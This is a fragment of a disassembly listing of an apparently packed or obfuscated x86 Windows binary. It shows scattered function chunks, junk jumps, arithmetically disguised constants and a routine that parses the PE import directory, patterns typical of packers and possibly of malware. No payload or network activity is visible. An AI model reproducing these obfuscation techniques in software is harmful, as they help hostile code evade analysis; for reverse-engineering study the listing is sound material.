; START OF FUNCTION CHUNK FOR sub_4241F3
loc_42B77C: ; CODE XREF: sub_4241F3:loc_426E65�j
; sub_42F56C+12�j
add edx, 8DBF3B03h
xchg edx, [esp+0]
jmp loc_42B107
; END OF FUNCTION CHUNK FOR sub_4241F3
; ---------------------------------------------------------------------------
loc_42B78A: ; CODE XREF: _7hdaygc1:0042384B�j
; _7hdaygc1:loc_42C06E�j
and edi, 6B3B04A1h
sub edi, 6704E43Ah
call sub_428498
loc_42B79B: ; CODE XREF: _7hdaygc1:0042F59D�j
jmp loc_423901
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42B7A0: ; CODE XREF: sub_4237DA+708E�j
jmp loc_42D91C
; ---------------------------------------------------------------------------
loc_42B7A5: ; CODE XREF: sub_4237DA+A3C9�j
mov eax, [eax]
mov [ebp-4], eax
push 12F4B64Eh
pop eax
loc_42B7B0: ; CODE XREF: sub_4232C2:loc_42E676�j
add eax, 0C1307D4h
jmp loc_428B50
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42B7BB: ; CODE XREF: sub_424AE1+A5EB�j
jz loc_423557
loc_42B7C1: ; CODE XREF: _7hdaygc1:0042FB69�j
jmp loc_42B198
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
sub ebx, ebp
jmp loc_423550
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FCD3
loc_42B7CD: ; CODE XREF: sub_42FCD3-4BAB�j
jge loc_42C962
loc_42B7D3: ; CODE XREF: _7hdaygc1:00426572�j
jmp loc_42579E
; END OF FUNCTION CHUNK FOR sub_42FCD3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42B7D8: ; CODE XREF: sub_426130-3B0�j
jmp loc_42D543
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
push ecx
mov edx, 529D58C7h
pushf
jmp loc_42C95C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42B7E9: ; CODE XREF: sub_4232C2:loc_423B13�j
or eax, 0F49EF9E5h
sub eax, 1BE90822h
js loc_42B305
; END OF FUNCTION CHUNK FOR sub_4232C2
; START OF FUNCTION CHUNK FOR sub_425735
loc_42B7FB: ; CODE XREF: sub_425735+701D�j
jmp loc_42D07D
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
push 245309C9h
test ecx, esi
jmp loc_42B2FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42B80E: ; DATA XREF: sub_42E168+8�o
add [esi], edx
xor [esi], ecx
cmp ebx, 756E6547h
jz loc_42DF37
jmp loc_42FD4B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42B823: ; CODE XREF: sub_42911B+C�j
mov ebp, esp
push ebx
push 62632B5Bh
pop ebx
jmp loc_424525
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_42B831: ; CODE XREF: sub_426A39:loc_428C31�j
add eax, ebp
add eax, 0B890E0EAh
mov eax, [eax]
mov ecx, [eax]
add eax, 4
jmp loc_423929
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
mov eax, esi
jmp sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B32F
loc_42B84C: ; CODE XREF: sub_42B32F+14�j
jnz loc_42F5D2
call sub_42D757
mov edx, 0B9726E5Ah
call sub_42C1AF
jmp loc_42DE25
; END OF FUNCTION CHUNK FOR sub_42B32F
; ---------------------------------------------------------------------------
adc ebx, 0C568D548h
jmp loc_427204
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42B872: ; CODE XREF: sub_42E283-2FBF�j
jmp loc_4255D4
; END OF FUNCTION CHUNK FOR sub_42E283
; =============== S U B R O U T I N E =======================================
sub_42B877 proc near ; CODE XREF: _7hdaygc1:0042B31F�j
; _7hdaygc1:0042F368�p
xchg ecx, [esp+0]
pop ecx
push edi
mov edi, eax
xchg edi, [esp+0]
call sub_428A69
sub_42B877 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42B886: ; CODE XREF: sub_42AA07:loc_42C7EE�j
jz loc_42B62B
jmp loc_42FAE7
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
loc_42B891: ; CODE XREF: _7hdaygc1:0042904E�j
; _7hdaygc1:0042D0EC�j
or edx, 9559B727h
xor edx, 50998672h
call sub_42C1AF
push ebx
mov ebx, eax
xchg ebx, [esp]
jmp loc_42DABB
; ---------------------------------------------------------------------------
loc_42B8AD: ; CODE XREF: _7hdaygc1:0042A7CF�j
add eax, 3E32E583h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_423CF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42B8BE: ; CODE XREF: sub_42C16F:loc_423C5D�j
add edx, 9FEC06FAh
xchg edx, [esp+0]
jmp sub_42AA07
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
adc ebx, edx
jmp loc_424741
; ---------------------------------------------------------------------------
loc_42B8D3: ; CODE XREF: _7hdaygc1:loc_42D8A8�j
; _7hdaygc1:loc_42E733�j
ja loc_42AC12
jmp loc_429164
; ---------------------------------------------------------------------------
loc_42B8DE: ; CODE XREF: _7hdaygc1:loc_42BC78�j
rol eax, 8
mov [ebp-14h], eax
rol eax, 8
push ecx
push offset sub_42B034
jmp locret_42E75A
; ---------------------------------------------------------------------------
loc_42B8F2: ; CODE XREF: _7hdaygc1:0042BBD4�j
jb loc_42B4B4
; =============== S U B R O U T I N E =======================================
sub_42B8F8 proc near ; CODE XREF: sub_42DDF5-1323�p
xchg ebx, [esp+0]
pop ebx
pop edi
retn
sub_42B8F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42B8FE: ; CODE XREF: _7hdaygc1:00427E97�j
; _7hdaygc1:loc_42C9B6�j
rol eax, 3
jmp loc_42A630
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42B907 proc near ; DATA XREF: _7hdaygc1:0042D0F1�o
; FUNCTION CHUNK AT 0042395F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00426489 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428230 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042880D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004293A7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A665 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B695 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DBDB SIZE 0000000D BYTES
test eax, eax
jz loc_423C59
loc_42B90F: ; CODE XREF: _7hdaygc1:loc_428A63�j
jmp loc_426489
sub_42B907 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42B914: ; CODE XREF: _7hdaygc1:0042F85A�j
jnp loc_428BC6
push eax
jmp sub_42F436
; ---------------------------------------------------------------------------
sub edx, 7212DB38h
js loc_42F214
jmp sub_428556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42B931: ; CODE XREF: sub_4291EA-BAB�j
push eax
call sub_42B650
retn
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_42B938: ; CODE XREF: _7hdaygc1:00429334�j
jmp loc_42E031
; ---------------------------------------------------------------------------
jmp nullsub_121
; =============== S U B R O U T I N E =======================================
sub_42B942 proc near ; CODE XREF: sub_4296EF+1CAA�p
; sub_42C763:loc_42C69B�j ...
; FUNCTION CHUNK AT 00424716 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BA9A SIZE 00000005 BYTES
jo sub_42FB6E
jmp loc_42BA9A
sub_42B942 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289CE
loc_42B94D: ; CODE XREF: sub_4289CE-2B3A�j
xchg ebp, [esp+0Ch+var_C]
loc_42B950: ; CODE XREF: _7hdaygc1:loc_42FCCD�j
mov eax, ebp
pop ebp
and eax, 99DE5E7Ch
add eax, 8F47B0ADh
jmp loc_424A5E
; END OF FUNCTION CHUNK FOR sub_4289CE
; ---------------------------------------------------------------------------
xor edx, 0E3505D68h
jmp sub_4269BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42B96F: ; CODE XREF: sub_42A052:loc_42F503�j
jnz loc_42A47E
jmp loc_427F96
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
dw 7220h
dword_42B97C dd 97C80FF1h ; sub_428BDA+4�w
; ---------------------------------------------------------------------------
loc_42B980: ; CODE XREF: _7hdaygc1:0042DDD1�j
jmp nullsub_195
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241F3
loc_42B985: ; CODE XREF: sub_4241F3:loc_4241FD�j
jmp loc_42427E
; END OF FUNCTION CHUNK FOR sub_4241F3
; ---------------------------------------------------------------------------
dw 94E8h
dword_42B98C dd 7E96BE40h ; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E481
loc_42B990: ; CODE XREF: sub_42E481+10�j
jmp nullsub_89
; END OF FUNCTION CHUNK FOR sub_42E481
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA11
loc_42B995: ; CODE XREF: sub_42AA11+9�j
jmp loc_424454
; END OF FUNCTION CHUNK FOR sub_42AA11
; ---------------------------------------------------------------------------
dw 8B8Ch
dword_42B99C dd 2F90173Ah dword_42B9A0 dd 0 ; sub_423F02+6�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F436
loc_42B9A4: ; CODE XREF: sub_42F436+7�j
jmp loc_425EFB
; END OF FUNCTION CHUNK FOR sub_42F436
; ---------------------------------------------------------------------------
db 41h, 20h, 0DEh
dword_42B9AC dd 0 ; _7hdaygc1:loc_428337�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E205
loc_42B9B0: ; CODE XREF: sub_42E205+C�j
jmp loc_42981A
; END OF FUNCTION CHUNK FOR sub_42E205
; ---------------------------------------------------------------------------
db 71h, 9Bh, 0ADh
dword_42B9B8 dd 7E410000h ; sub_425F27-2EF8�r ...
dword_42B9BC dd 0C965DCD5h, 32B823CCh ; sub_42F621+C�o
db 8Dh, 0C6h, 0
; ---------------------------------------------------------------------------
loc_42B9C7: ; CODE XREF: _7hdaygc1:0042394B�j
jmp loc_427FB0
; ---------------------------------------------------------------------------
loc_42B9CC: ; CODE XREF: _7hdaygc1:00428043�j
sbb esi, ebp
; =============== S U B R O U T I N E =======================================
sub_42B9CE proc near ; CODE XREF: sub_42AA07-CF6�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423CDF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00429743 SIZE 00000017 BYTES
xchg edx, [esp+0]
pop edx
push edi
push 41CA8273h
xchg ebp, [esp+4+var_4]
jmp loc_429743
sub_42B9CE endp
; ---------------------------------------------------------------------------
locret_42B9E0: ; CODE XREF: _7hdaygc1:004257C0�j
retn
; =============== S U B R O U T I N E =======================================
sub_42B9E1 proc near ; CODE XREF: sub_425735+13�p
; sub_42D073+13�p
; FUNCTION CHUNK AT 00427393 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042853B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042F5A7 SIZE 00000005 BYTES
xor bx, bx
add ebx, 10000h
loc_42B9EA: ; CODE XREF: sub_42B9E1-4640�j
; sub_42B9E1-349E�j
jb loc_427393
sub ebx, 10000h
jmp loc_42F5A7
sub_42B9E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42B9FB: ; CODE XREF: sub_4232C2+A185�j
push offset loc_425EEA
jmp nullsub_170
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42BA05: ; CODE XREF: sub_425A37+7179�j
jge loc_42F4F0
loc_42BA0B: ; CODE XREF: sub_426CBB+8F84�j
jmp loc_42CCEC
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
cmp ebp, 0C74F2081h
jmp loc_428C54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42BA1B: ; CODE XREF: sub_423648:loc_42F373�j
mov eax, [ebp-20h]
call sub_42BA2C
pop ecx
mov [ebp-20h], eax
jmp loc_42FA7C
; END OF FUNCTION CHUNK FOR sub_423648
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BA2C proc near ; CODE XREF: sub_423648+83D6�p
; FUNCTION CHUNK AT 0042578C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428FDD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429BE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A18D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042FB07 SIZE 00000015 BYTES
push ebp
mov ebp, esp
jmp loc_429BE8
sub_42BA2C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
adc edx, esi
jmp loc_42AEE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_42BA3B: ; CODE XREF: sub_428498+38D0�j
shr eax, 6
jbe loc_42A28D
loc_42BA44: ; CODE XREF: sub_428498:loc_426C40�j
mov eax, [ebp-28h]
cmp eax, [ebp-14h]
jmp loc_42579E
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_42BA4F: ; CODE XREF: sub_42DAD9-58F2�j
jl loc_42971A
loc_42BA55: ; CODE XREF: _7hdaygc1:00428061�j
jmp loc_4295DF
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E9C
loc_42BA5A: ; CODE XREF: sub_424E9C+B�j
jmp loc_42A745
; END OF FUNCTION CHUNK FOR sub_424E9C
; ---------------------------------------------------------------------------
push 8ED2CDBAh
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42BA64: ; CODE XREF: sub_4232DA:loc_42FC73�j
ror ebx, 18h
jmp loc_42970D
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
jnz loc_428BCF
jmp loc_42EFCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42BA77: ; CODE XREF: sub_423752:loc_424B4D�j
jl loc_429440
loc_42BA7D: ; CODE XREF: _7hdaygc1:00427144�j
jmp loc_42812C
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
popf
cdq
jmp loc_429434
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AF
loc_42BA89: ; CODE XREF: sub_42C1AF+3�j
jz sub_42F68E
add esp, 0FFFFFED8h
call sub_42C3E4
; END OF FUNCTION CHUNK FOR sub_42C1AF
; START OF FUNCTION CHUNK FOR sub_42B942
loc_42BA9A: ; CODE XREF: sub_42B942+6�j
jmp loc_424716
; END OF FUNCTION CHUNK FOR sub_42B942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F72
loc_42BA9F: ; CODE XREF: sub_427F72+1E�j
jmp loc_424ACA
; END OF FUNCTION CHUNK FOR sub_427F72
; ---------------------------------------------------------------------------
loc_42BAA4: ; CODE XREF: _7hdaygc1:loc_423C33�j
mov [ebp-0Bh], al
xor eax, eax
mov al, [ebp-0Bh]
mov ecx, 8
push offset loc_42A1D4
jmp loc_424DEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42BABB: ; CODE XREF: sub_425E64:loc_42A7DA�j
mov ecx, ebp
xchg ecx, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
push offset sub_42A833
jmp nullsub_116
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42BACF: ; CODE XREF: sub_42EBD6:loc_42A4BB�j
sbb eax, 55736BD0h
; END OF FUNCTION CHUNK FOR sub_42EBD6
; =============== S U B R O U T I N E =======================================
sub_42BAD5 proc near ; CODE XREF: sub_426BF7+5B8B�p
; FUNCTION CHUNK AT 00425289 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004258BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425FDC SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
shl eax, 3
loc_42BADC: ; CODE XREF: _7hdaygc1:0042C8F5�j
lea eax, [eax+eax*4]
mov edx, [ebp-4]
jmp loc_425289
sub_42BAD5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42BAE7 proc near ; DATA XREF: sub_42A052:loc_42A898�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423123 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423A97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423BC9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042441B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042476C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429385 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00429D36 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429E69 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D183 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DC03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA82 SIZE 00000019 BYTES
cmp dword ptr [ebp-10h], 0
jnz loc_42EA8D
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 6
jmp loc_42441B
sub_42BAE7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42BAFE: ; CODE XREF: _7hdaygc1:loc_424659�j
mov ds:dword_42B98C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428079
loc_42BB05: ; CODE XREF: sub_428079+9�j
jmp loc_424C27
; END OF FUNCTION CHUNK FOR sub_428079
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA3D
loc_42BB0A: ; CODE XREF: sub_42FA3D-9279�j
jmp loc_42CE7D
; END OF FUNCTION CHUNK FOR sub_42FA3D
; ---------------------------------------------------------------------------
loc_42BB0F: ; CODE XREF: _7hdaygc1:00426842�j
call sub_42B462
; START OF FUNCTION CHUNK FOR sub_425735
loc_42BB14: ; CODE XREF: sub_425735:loc_4280ED�j
mov edx, [ebx+3Ch]
mov edx, [ebx+edx+80h]
or edx, edx
jz loc_427E44
loc_42BB26: ; CODE XREF: sub_42F9D2-C127�j
; sub_425735:loc_42C746�j
jo loc_42C757
add edx, 14h
jmp loc_42E6A1
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_42BB34: ; CODE XREF: sub_42A2EF:loc_423EA8�j
; _7hdaygc1:00423EC3�j
sub ebx, 705C9AAh
add ebx, 0F07762DCh
xchg ebx, [esp+0]
jmp loc_423129
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_42BB48: ; CODE XREF: sub_424A2B:loc_4250CB�j
shl eax, 0Ah
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 6
xor [ebp-8], eax
push offset sub_42D744
jmp loc_425D4B
; END OF FUNCTION CHUNK FOR sub_424A2B
; =============== S U B R O U T I N E =======================================
sub_42BB61 proc near ; DATA XREF: _7hdaygc1:0042DA2D�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426FAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004285B3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042D394 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042F996 SIZE 00000005 BYTES
push edx
pushf
push 9021DAFEh
pop edx
jmp loc_4285B3
sub_42BB61 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42BB6F: ; CODE XREF: _7hdaygc1:00426081�j
cmp edx, ecx
jmp loc_4246D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB0D
loc_42BB76: ; CODE XREF: sub_42EB0D-A6BE�j
dec eax
test eax, eax
call sub_42FCD3
loc_42BB7E: ; CODE XREF: _7hdaygc1:0042DEDF�j
jmp loc_423D52
; END OF FUNCTION CHUNK FOR sub_42EB0D
; =============== S U B R O U T I N E =======================================
sub_42BB83 proc near ; DATA XREF: sub_42A462+4329�o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423FB3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042431E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042465E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00424EAC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424FAF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042597B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426E5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ACCD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042BE07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE95 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E051 SIZE 00000005 BYTES
xor edx, esi
pop esi
mov eax, offset dword_42E198
call sub_42AA07
call sub_423F02
jmp loc_42E051
sub_42BB83 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42BB9A: ; CODE XREF: sub_424AE1+3AC6�j
xor eax, 0B34ED517h
add eax, 5BDAB775h
and eax, 6E8B70C6h
xor eax, 922A58EFh
loc_42BBB2: ; CODE XREF: _7hdaygc1:loc_42535A�j
add eax, ebp
add eax, 475EF7BBh
mov eax, [eax]
jmp loc_423A5C
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_42BBC1: ; CODE XREF: _7hdaygc1:0042C52B�j
js loc_42C22E
add ebp, esi
jmp sub_42EE8A
; ---------------------------------------------------------------------------
test edx, 917425C3h
jmp loc_42B8F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42828C
loc_42BBD9: ; CODE XREF: sub_42828C:loc_429C0E�j
push 0
push ebx
push offset loc_427FF2
jmp loc_42E98D
; END OF FUNCTION CHUNK FOR sub_42828C
; ---------------------------------------------------------------------------
loc_42BBE6: ; CODE XREF: _7hdaygc1:0042A71C�j
xor eax, esi
loc_42BBE8: ; CODE XREF: _7hdaygc1:loc_42A6FF�j
or ebx, 0D00B48E9h
add ebx, 0F92D30Fh
xchg ebx, [esp]
jmp loc_42BE5D
; ---------------------------------------------------------------------------
push eax
jmp loc_42883A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDA
loc_42BC02: ; CODE XREF: sub_42BEDA:loc_42CA55�j
xchg ecx, [esp+0]
mov edi, eax
xchg edi, [esp+0]
mov eax, [ebp-30h]
jmp loc_42D44C
; END OF FUNCTION CHUNK FOR sub_42BEDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42BC12: ; CODE XREF: sub_42AFFE:loc_4297AD�j
mov edx, 0CF0182F6h
call sub_42C763
call sub_425670
loc_42BC21: ; CODE XREF: _7hdaygc1:loc_42F718�j
cmp eax, edx
jmp loc_42D563
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42BC28: ; CODE XREF: sub_42C50D-75B0�j
or eax, eax
jnz loc_42A47E
jmp loc_42CDE7
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
db 0A3h, 27h, 0B4h
dword_42BC38 dd 67C8354h ; _7hdaygc1:0042F1AA�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4296EF
loc_42BC3C: ; CODE XREF: sub_4296EF+E�j
jmp loc_42B394
; END OF FUNCTION CHUNK FOR sub_4296EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCC
loc_42BC41: ; CODE XREF: sub_423CCC+E�j
jmp loc_42B0F0
; END OF FUNCTION CHUNK FOR sub_423CCC
; ---------------------------------------------------------------------------
dw 9538h
dword_42BC48 dd 0F90BD06h ; sub_42A833+1�r
dword_42BC4C dd 0 ; sub_425CA9+8�o ...
; ---------------------------------------------------------------------------
loc_42BC50: ; CODE XREF: _7hdaygc1:00426FBD�j
jmp loc_42675E
; ---------------------------------------------------------------------------
db 2Ah, 7, 8
dword_42BC58 dd 1459C8h ; _7hdaygc1:004248EF�r ...
dword_42BC5C dd 418C2E7Eh dword_42BC60 dd 145B78h ; _7hdaygc1:00426D54�w ...
dword_42BC64 dd 0 ; _7hdaygc1:0042D6E9�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42BC68: ; CODE XREF: sub_4253A0+5210�j
jmp nullsub_55
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_42BC6D: ; CODE XREF: sub_424744-380�j
jmp loc_429B5D
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
dw 0BB4Dh
dword_42BC74 dd 0 ; sub_42616B+2C95�r
; ---------------------------------------------------------------------------
loc_42BC78: ; CODE XREF: _7hdaygc1:0042C508�j
jmp loc_42B8DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDF5
loc_42BC7D: ; CODE XREF: sub_42DDF5-4A0A�j
jmp loc_42CAB4
; END OF FUNCTION CHUNK FOR sub_42DDF5
; ---------------------------------------------------------------------------
loc_42BC82: ; CODE XREF: _7hdaygc1:00423A08�j
push eax
sbb ebx, ebp
; START OF FUNCTION CHUNK FOR sub_423172
loc_42BC85: ; CODE XREF: sub_423172:loc_4239F7�j
add ebx, 20846EBDh
popf
xchg ebx, [esp+0]
jmp loc_4263D7
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_42BC94: ; CODE XREF: sub_425C2C+BFD�j
call sub_42653E
loc_42BC99: ; CODE XREF: sub_42CA28+E�j
jmp loc_42BF18
; END OF FUNCTION CHUNK FOR sub_425C2C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD "+" TO EXPAND]
db 81h
dd 93381CDh, 32FF815Ch, 0E93FD0E8h, 0FFFFB619h, 0ECFE95Dh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_42BCB6: ; CODE XREF: sub_42CDF7:loc_42EEB2�j
mov eax, offset dword_42BC4C
call sub_42DBEA
push ebx
push 6C8316CBh
pop ebx
xor ebx, 0E2E4C337h
sub ebx, ds:4000F5h
test ebx, 4000h
jmp loc_424410
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F0B4
loc_42BCDE: ; CODE XREF: sub_42F0B4+1�j
mov ebp, esp
push offset loc_42CC0F
jmp nullsub_113
; END OF FUNCTION CHUNK FOR sub_42F0B4
; ---------------------------------------------------------------------------
xor ecx, 8FDA9C3h
popf
jmp sub_4253A0
; =============== S U B R O U T I N E =======================================
sub_42BCF6 proc near ; CODE XREF: _7hdaygc1:00426FFC�j
; sub_42FCD3+A�p
xchg edx, [esp+0]
pop edx
inc eax
mov [ebp-1Ch], eax
call sub_42E51C
sub_42BCF6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42BD03 proc near ; CODE XREF: sub_42D002+7�p
; _7hdaygc1:0042E905�j
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-30h]
push ecx
mov ecx, eax
xchg ecx, [esp+0]
jmp loc_427222
sub_42BD03 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_42BD15: ; CODE XREF: sub_426A62+510�j
popf
or ebx, ecx
mov edx, 21F9B228h
jmp loc_428D63
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
push 4C30CF69h
pop eax
sub eax, 6AD617F2h
and eax, 0EEFDDE9Eh
add eax, 0CE46E299h
test eax, 8
jmp loc_425279
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42BD45: ; CODE XREF: sub_429318-5C0A�j
push 0F1C1D899h
xor edi, edx
jmp loc_42F9B7
